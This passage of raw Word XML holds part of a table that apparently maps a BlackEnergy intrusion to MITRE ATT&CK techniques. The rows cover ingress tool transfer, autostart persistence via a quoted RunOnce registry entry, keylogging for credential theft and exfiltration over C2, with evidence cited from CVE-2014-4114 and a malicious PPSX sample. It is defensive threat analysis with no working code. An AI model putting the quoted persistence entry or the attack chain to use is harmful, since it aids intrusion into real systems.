                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24E7136C" w14:textId="557E2DD4" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="360BDE6C" w14:textId="24C07348" w:rsidR="0024244B" w:rsidRPr="00B857D7" w:rsidRDefault="00E32B30" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0060B7C5" w14:textId="44095738" w:rsidR="0024244B" w:rsidRPr="00A5536D" w:rsidRDefault="00E0220D" w:rsidP="00230FE4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="0024244B" w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The user tricked into execution (CVE-201</w:t>
            </w:r>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0024244B" w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4114</w:t>
            </w:r>
            <w:r w:rsidR="0024244B" w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> allow remote attackers to execute arbitrary code</w:t>
            </w:r>
            <w:r w:rsidR="00547E34" w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">. Via crafted OLE object in </w:t>
            </w:r>
            <w:r w:rsidR="00230FE4" w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>office</w:t>
            </w:r>
            <w:r w:rsidR="00547E34" w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="0062544E" w14:paraId="595EF670" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32EADC8C" w14:textId="2B211608" w:rsidR="00A5536D" w:rsidRPr="0062544E" w:rsidRDefault="00A5536D" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="771BBAC7" w14:textId="34CB074E" w:rsidR="00A5536D" w:rsidRPr="0062544E" w:rsidRDefault="00A5536D" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DD94EEA" w14:textId="27BC1BF7" w:rsidR="00A5536D" w:rsidRPr="0062544E" w:rsidRDefault="00A5536D" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14B55322" w14:textId="314CFDC8" w:rsidR="00A5536D" w:rsidRDefault="00686154" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B42F707" w14:textId="77777777" w:rsidR="00A5536D" w:rsidRPr="0062544E" w:rsidRDefault="00A5536D" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="230B7973" w14:textId="71B0B952" w:rsidR="00A5536D" w:rsidRPr="0062544E" w:rsidRDefault="00686154" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A3EE335" w14:textId="3406EBB6" w:rsidR="00A5536D" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E32B30">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20F6C3CC" w14:textId="77777777" w:rsidR="00A5536D" w:rsidRDefault="00A5536D" w:rsidP="00701770">
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5536D">
              <w:t>An attacker who successfully exploited this vulnerability could assume the role of the current user on the target machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="299F2519" w14:textId="6D4D3DC0" w:rsidR="004E787E" w:rsidRPr="00A5536D" w:rsidRDefault="004E787E" w:rsidP="00701770">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[7] </w:t>
            </w:r>
            <w:r w:rsidR="00686154" w:rsidRPr="004E787E">
              <w:t>In the case of the live sample exploit PPSX file I examined, it automatically downloaded the payload from a remote SMB share</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="0062544E" w14:paraId="72903743" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AC4EDD3" w14:textId="21A4ED1E" w:rsidR="00686154" w:rsidRPr="0062544E" w:rsidRDefault="00686154" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE4776B" w14:textId="53C68CE6" w:rsidR="00686154" w:rsidRPr="0062544E" w:rsidRDefault="00686154" w:rsidP="0024244B">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0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AC60D74" w14:textId="0966475B" w:rsidR="00686154" w:rsidRPr="0062544E" w:rsidRDefault="00FC48FE" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC48FE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FC48FE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1547</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC48FE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FC48FE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FC48FE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AFEDCDA" w14:textId="33CC232F" w:rsidR="00686154" w:rsidRDefault="00FC48FE" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E6B7C7F" w14:textId="77777777" w:rsidR="00686154" w:rsidRPr="0062544E" w:rsidRDefault="00686154" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C940427" w14:textId="396E9399" w:rsidR="00686154" w:rsidRDefault="00FC48FE" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55703B49" w14:textId="4A1D9F30" w:rsidR="00686154" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1976D317" w14:textId="77777777" w:rsidR="00686154" w:rsidRDefault="00FC48FE" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[7] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>INF contains “</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00686154">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>HKLM,Software</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00686154">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D9F47BF" w14:textId="7E449DAF" w:rsidR="00E0086E" w:rsidRPr="0062544E" w:rsidRDefault="00E55898" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00E0086E" w:rsidRPr="00E0086E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00E0086E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Black</w:t>
            </w:r>
            <w:r w:rsidR="005E582C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidR="00E0086E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>nergy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00E0086E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> installed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="0062544E" w14:paraId="1F0657D7" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7356C0C4" w14:textId="7179DE48" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="00DD4A99" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="622E05A1" w14:textId="5BC869E6" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="0024244B" w:rsidP="0024244B">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0006 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A9AD705" w14:textId="51BA8E78" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1056.001 Input Capture: Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41379303" w14:textId="6FC01677" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E06EC84" w14:textId="77777777" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FDDA10B" w14:textId="2B66BE6D" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="006E6EE6" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C0FBCC6" w14:textId="30351A3D" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-CAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52C9B3DF" w14:textId="4404D18A" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="00DD4A99" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD4A99">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">used a particular variant of malware called </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>BlackEnergy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> to steal user credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="0062544E" w14:paraId="4CDE9CD5" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F4E7B06" w14:textId="2285DCFE" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="00DD4A99" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60D273AA" w14:textId="23623F08" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="0024244B" w:rsidP="0024244B">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0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04AC1C79" w14:textId="7998205C" w:rsidR="0024244B" w:rsidRPr="0062544E" w:rsidRDefault="0024244B" w:rsidP="0024244B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
